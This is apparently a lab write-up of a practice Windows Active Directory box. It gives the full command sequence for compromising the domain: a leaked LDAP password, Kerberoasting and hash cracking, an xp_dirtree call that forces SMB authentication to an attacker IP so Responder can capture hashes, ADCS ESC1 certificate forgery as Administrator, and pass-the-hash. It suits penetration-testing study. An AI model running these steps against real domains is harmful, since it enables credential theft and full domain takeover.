Myles Nieman
← All writeups

Overcertified

Overview

Overcertified is an easy Windows Active Directory box with an Active Directory Certificate Services (ADCS) twist. The LDAP service account (ldapusr) has its own password stored in its LDAP description field — an embarrassingly common real-world misconfiguration. With those credentials, BloodHound reveals a Kerberoastable MSSQLSERVER account whose cracked password gives MSSQL access. Inside MSSQL, xp_dirtree forces an outbound authentication that Responder captures as thomas’s NTLMv2 hash. Cracking that hash and logging in as thomas, certipy identifies the Auth certificate template as vulnerable to ESC1 (enrollee-supplied Subject Alternative Name with Client Authentication EKU). Requesting a certificate impersonating administrator@certified.htb and authenticating with it via PKINIT yields the Administrator NTLM hash, completing the domain compromise.

Path: LDAP description → ldapusr:ldapisfun → Kerberoast MSSQLSERVER → MSSQL xp_dirtree → capture thomas’s NTLMv2 → SSH/WinRM as thomas → certipy ESC1 → certificate as Administrator → NTLM hash → pass-the-hash → root.

Enumeration

A full port scan identifies a Windows domain controller for certified.htb with ADCS-related services present:

$ nmap -p- -A 10.129.229.25 -Pn
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb)
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb)
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0
9389/tcp  open  mc-nmf        .NET Message Framing

Nmap output confirming certified.htb domain controller

Domain: certified.htb, hostname: CERTIFIED. Adding both certified.htb and CERTIFIED.certified.htb to /etc/hosts.

Anonymous SMB and RPC enumeration return nothing useful. Anonymous LDAP bind succeeds and leaks user objects — notably:

  • CN=ldapusr,CN=Users,DC=certified,DC=htb
  • MSSQLSERVER service account
  • thomas

The ldapusr object’s description attribute contains the account’s own password: ldapisfun.

Foothold — BloodHound Collection and Kerberoasting

With ldapusr:ldapisfun, BloodHound can be collected:

$ python3 /tools/bloodhoundCE-py/bloodhound.py -u ldapusr -p "ldapisfun" \
    -d certified.htb -c All --zip -ns 10.129.229.25

BloodHound collection running as ldapusr

A Kerberoastable users cypher query in BloodHound identifies MSSQLSERVER:

BloodHound query showing MSSQLSERVER as kerberoastable

Requesting the service ticket requires syncing the clock first (7-hour skew):

$ sudo systemctl stop systemd-timesyncd.service
$ sudo rdate -n certified.htb
$ GetUserSPNs.py certified.htb/ldapusr:ldapisfun -dc-ip 10.129.229.25 -request

Clock sync required before Kerberos operations

Cracking the resulting TGS hash with hashcat:

$ hashcat -m 13100 SQLHash /tools/SecLists/Passwords/Leaked-Databases/rockyou.txt

Hashcat cracking the MSSQLSERVER Kerberoast hash

Recovered credentials: mssqlserver:lucky7

An initial port scan missed MSSQL (port 1433 was filtered); a quick rescan confirms it is open. Connecting with impacket:

$ mssqlclient.py certified.htb/mssqlserver:lucky7@certified.htb -windows-auth

mssqlclient connected to the MSSQLSERVER instance

Lateral Movement — xp_dirtree to NTLMv2 Capture

xp_cmdshell cannot be enabled, but xp_dirtree works and will trigger an outbound SMB authentication to an attacker-controlled server. Starting Responder on the tun0 interface and pointing xp_dirtree at our host:

xp_dirtree \\10.10.14.3\ha1ks

xp_dirtree forcing outbound SMB authentication

Responder capturing thomas’s NTLMv2 hash

Responder captures thomas’s NTLMv2 hash. Cracking it:

$ hashcat -m 5600 thomashash /tools/SecLists/Passwords/Leaked-Databases/rockyou.txt

Hashcat cracking thomas’s NTLMv2 hash

thomas:159357 recovered

Credentials recovered: thomas:159357

User

Logging in as thomas (via WinRM on 5985) and checking group memberships shows no special privileges or admin groups:

thomas has no special groups or elevated privileges

The user flag is in thomas’s home directory.

Privilege Escalation — ADCS ESC1

The initial BloodHound collection did not include certificate template data. Running certipy with the -bloodhound flag adds it:

$ certipy find -u "thomas" -p "159357" -bloodhound -target certified.htb

certipy bloodhound output — GUIDs not resolving

Using the -old-bloodhound flag produces a format that BloodHound CE resolves correctly:

$ certipy find -u "thomas" -p "159357" -old-bloodhound -target certified.htb

certipy old-bloodhound output loaded into BloodHound

Reviewing the certipy text output shows the Auth template is vulnerable to ESC1:

[!] Vulnerabilities
  ESC1: 'CERTIFIED.HTB\\Domain Users' and 'CERTIFIED.HTB\\Authenticated Users'
        can enroll, enrollee supplies subject and template allows client authentication

ESC1 means any domain user can request a certificate from the Auth template and specify an arbitrary UPN in the Subject Alternative Name — including administrator@certified.htb.

ESC1 vulnerability description from the Certified Pre-Owned whitepaper

Requesting a certificate impersonating the Administrator:

$ certipy req -u "thomas" -p "159357" -ca "CERTIFIED-CA" \
    -template "Auth" -upn administrator@certified.htb -target CERTIFIED-CA

certipy successfully requesting a certificate as administrator@certified.htb

Authenticating with the certificate to recover the Administrator NTLM hash:

$ certipy auth -pfx administrator.pfx

certipy auth recovering the Administrator NTLM hash via PKINIT

Root

Pass the Administrator NTLM hash into Evil-WinRM for a root shell:

$ evil-winrm -u Administrator -H <hash> -i certified.htb

Evil-WinRM shell as Administrator

Domain compromised.

Takeaways

  • Storing a password in an LDAP description field is a real-world finding that surfaces regularly; always check the description attribute on service accounts during LDAP enumeration.
  • ADCS ESC1 is one of the most impactful ADCS misconfigurations: a template that allows enrollee-supplied SAN and has Client Authentication EKU lets any enrollee forge certificates for any identity in the domain, including Administrator — instant privilege escalation with no exploit code required.